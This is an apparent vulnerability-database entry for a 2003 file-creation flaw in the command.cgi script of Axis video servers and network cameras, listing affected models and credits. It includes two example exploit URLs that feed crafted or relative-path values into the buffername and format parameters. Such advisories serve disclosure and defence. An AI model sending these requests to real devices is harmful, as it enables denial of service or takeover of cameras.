ID
VAR-E-200302-0118
EDB ID
22311
TITLE
Axis Communications Video Server 2.x - 'Command.cgi' File Creation - CGI remote Exploit
Trust: 0.6
DESCRIPTION
Axis Communications Video Server 2.x - 'Command.cgi' File Creation.. remote exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | axis | model: | communications video server | scope: | eq | version: | 2.x | Trust: 1.0 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.33 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.20 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.20 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.32 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/6987/info
It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.
http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]
http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'Command.cgi' File Creation
Trust: 1.0
CREDITS
Martin Eiszner
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 6987 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 22311 | Trust: 1.6 |
db: | EDBNET | id: | 44503 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/6987/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/22311/ | Trust: 0.6 |
url: | http://www.axis.com/products/camera_servers/index.htm | Trust: 0.3 |
SOURCES
db: | BID | id: | 6987 |
db: | EXPLOIT-DB | id: | 22311 |
db: | EDBNET | id: | 44503 |
LAST UPDATE DATE
2022-07-27T09:48:56.515000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 6987 | date: | 2003-02-28T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 6987 | date: | 2003-02-28T00:00:00 |
db: | EXPLOIT-DB | id: | 22311 | date: | 2003-02-28T00:00:00 |
db: | EDBNET | id: | 44503 | date: | 2003-02-28T00:00:00 |